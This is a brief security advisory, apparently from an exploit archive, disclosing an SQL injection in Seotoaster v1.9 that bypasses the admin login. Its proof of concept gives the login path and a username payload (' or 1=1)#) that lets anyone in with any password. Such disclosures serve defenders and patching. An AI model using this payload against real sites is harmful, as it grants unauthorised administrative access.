id: 17279
date: 12/16/2011
title: Seotoaster SQL Injection Admin Login Bypass
author: Stefan Schurtz
cves: 

#################################################################################
# Advisory:     Seotoaster SQL-Injection Admin Login Bypass
# Author:               Stefan Schurtz
# Contact:              sschurtz@t-online.de
# Affected Software:        Successfully tested on Seotoaster v.1.9
# Vendor URL:           http://www.seotoaster.com/
# Vendor Status:        fixed
#################################################################################
 
==========================
Vulnerability Description
==========================
 
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
 
==================
PoC-Exploit
==================
 
http://<target>/seotoaster/go
 
User: ' or 1=1)#
PW: notimportant
 
=========
Solution
=========
 
Upgrade to the latest version



#  0day.today [2023-03-21]  #